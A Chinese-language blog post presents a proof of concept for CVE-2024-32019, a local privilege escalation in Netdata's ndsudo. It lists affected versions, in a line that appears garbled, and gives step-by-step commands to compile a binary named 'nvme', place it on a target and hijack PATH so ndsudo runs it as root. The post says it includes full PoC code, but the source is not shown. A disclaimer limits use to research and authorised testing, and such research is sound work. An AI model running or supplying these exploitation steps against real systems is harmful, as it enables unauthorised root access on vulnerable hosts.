CVE-2024-32019本地提权漏洞利用与PoC分析

本文详细分析了CVE-2024-32019漏洞的利用方法,通过ndsudo的不受信任搜索路径实现本地权限提升,包含完整的PoC代码和编译部署步骤,适用于教育研究和授权渗透测试场景。

⚠️ CVE-2024-32019 - PoC

📌 受影响版本

  • >= v1.45.0, = v1.44.0-60, < v1.45.0-169

🛠️ 概念验证

CVE-2024-32019 — 通过不受信任的搜索路径实现ndsudo本地权限提升。

🔧 编译漏洞利用程序

1
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 在目标机器上部署

  1. 将编译后的二进制文件传输到易受攻击的机器。

  2. 使其可执行:

    1
    
    chmod +x nvme
    
  3. 通过PATH操作利用易受攻击的二进制文件(使用上传二进制文件的相同路径):

    1
    
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 参考


⚖️ 免责声明和条款

此概念验证(PoC)代码仅用于教育和授权的渗透测试目的

  • 未经许可,不得修改、重新分发或将此代码用于任何其他目的。
  • 未经授权的使用或修改可能是非法和不道德的
  • 作者对任何误用或损害不承担任何责任
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计